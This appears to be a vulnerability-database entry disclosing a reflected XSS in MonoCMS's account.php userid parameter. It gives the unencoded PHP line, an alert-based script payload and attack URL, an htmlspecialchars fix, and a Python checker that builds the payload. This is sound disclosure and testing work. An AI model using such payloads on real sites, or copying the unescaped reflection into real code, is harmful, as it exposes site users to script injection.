Title | MonoCMS 23-20240528 Improper Neutralization of Alternate XSS Syntax |
---|
Description | [XSS vulnerability] found in MonoCMS 23-20240528 - (/monofiles/account.php)
Affected Project: MonoCMS
Web: Php
Vendor: MonoCMS
Official Website: https://monocms.com/
Version: 23-20240528
Updated: 28 May, 2024
Related Code file: /monofiles/account.php
Injection parameter: userid
Sha1: 9532cda20cf7fa456d6f00ce0fe194767913ba83
Vulnerability Description:
The issue arises because the userid parameter from the URL is printed directly into the value attribute of an HTML input element without output encoding.
This allows an attacker to inject arbitrary HTML or JavaScript, leading to a reflected XSS attack against any user who opens a crafted link.
Vulnerable code:
<input name="hiddenid" type="text" value="<?php if (isset($_GET['userid'])) print $_GET['userid'] ?>" hidden>
Injection Payload Tested:
We set userid to:
"><script>alert('XSS')</script>
URL-encoded, this becomes:
%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
Resulting HTML After Injection:
<input name="hiddenid" type="text" value=""><script>alert('XSS')</script>" hidden>
The injected "> closes the value attribute and the input tag, so the following <script> element is parsed as a separate node in the DOM.
Execution:
When the browser parses this HTML, it executes alert('XSS'), resulting in a popup displaying "XSS" (the demonstration below uses the message "XSS by secuserx").
Demonstration:
Below is how /monofiles/account.php looks:
https://i.postimg.cc/dV25sxCv/1.png
Then we can add our payload "><script>alert('XSS by secuserx')</script> :
http://localhost:8080/monofiles/account.php?userid="><script>alert('XSS by secuserx')</script>
https://i.postimg.cc/CKwmzsC8/2.png
After opening the URL with the vulnerable parameter userid set to the XSS payload "><script>alert('XSS by secuserx')</script>, the XSS is triggered:
https://i.postimg.cc/pdkk85k6/3.png
Recommendation for Preventing XSS:
To fix this vulnerability, user input must be encoded for the context it is rendered into before it is printed into HTML. For a quoted attribute value, htmlspecialchars() in PHP with ENT_QUOTES encodes &, <, >, " and ', so the payload can no longer terminate the attribute or the tag.
Example:
<input name="hiddenid" type="text" value="<?php if (isset($_GET['userid'])) print htmlspecialchars($_GET['userid'], ENT_QUOTES, 'UTF-8') ?>" hidden>
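The following is an added verification script, not code from MonoCMS or from the original advisory. It is written in Python rather than PHP and models the two templates above (raw print versus htmlspecialchars with ENT_QUOTES, for which html.escape(quote=True) is the Python analogue) as constructed sample responses, builds the URL-encoded payload, and then parses each rendered response with an HTML tokenizer to show that the raw reflection yields a separate <script> element while the encoded one keeps the whole payload inside the value attribute. The base URL, parameter name and rendering functions are assumptions made for the demonstration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

# Payload from the advisory.
PAYLOAD = "\"><script>alert('XSS')</script>"


def build_url(base, param, payload):
    """Builds the attack URL; ' ( ) and / are left unencoded to match the advisory's form."""
    encoded = quote(payload, safe="/'()")
    return f"{base}?{param}={encoded}"


def vulnerable_render(userid):
    """Constructed model of the original template: the raw parameter printed into a quoted attribute."""
    return f'<input name="hiddenid" type="text" value="{userid}" hidden>'


def fixed_render(userid):
    """Constructed model of the fixed template.

    html.escape(quote=True) encodes & < > " and ' like
    htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); it emits &#x27; where PHP emits &#039;,
    which the browser decodes identically.
    """
    return f'<input name="hiddenid" type="text" value="{escape(userid, quote=True)}" hidden>'


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, roughly as a browser's tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(body):
    parser = TagCollector()
    parser.feed(body)
    parser.close()
    return parser.tags


def script_tag_count(body):
    """Number of <script> elements the tokenizer produces; any count > 0 means attribute breakout."""
    return sum(1 for tag, _ in parse_tags(body) if tag == "script")


def hiddenid_value(body):
    """Decoded value attribute of the hiddenid input, or None if the element is missing."""
    for tag, attrs in parse_tags(body):
        if tag == "input" and attrs.get("name") == "hiddenid":
            return attrs.get("value")
    return None


if __name__ == "__main__":
    url = build_url("http://localhost:8080/monofiles/account.php", "userid", PAYLOAD)
    print("attack URL:", url)
    for label, render in (("vulnerable", vulnerable_render), ("fixed", fixed_render)):
        body = render(PAYLOAD)
        print(f"{label}: {body}")
        print(f"  script elements: {script_tag_count(body)}")
        print(f"  hiddenid value : {hiddenid_value(body)!r}")
```

Against a live instance the same two checks apply to the fetched response body: a <script> element (or any new tag) appearing in the parsed output, or a hiddenid value that is shorter than the payload sent, means the parameter is still reflected unencoded.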
|
---|
Source | https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20MonoCMS%2023-20240528%20-%20(account.php).md |
---|
User | secuserx (UID 76735) |
---|
Submission | 10/30/2024 01:22 AM |
---|
Moderation | 11/06/2024 05:37 PM (8 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 283326 [MonoCMS up to 20240528 Account Information Page /monofiles/account.php userid cross site scripting] |
---|
Points | 20 |
---|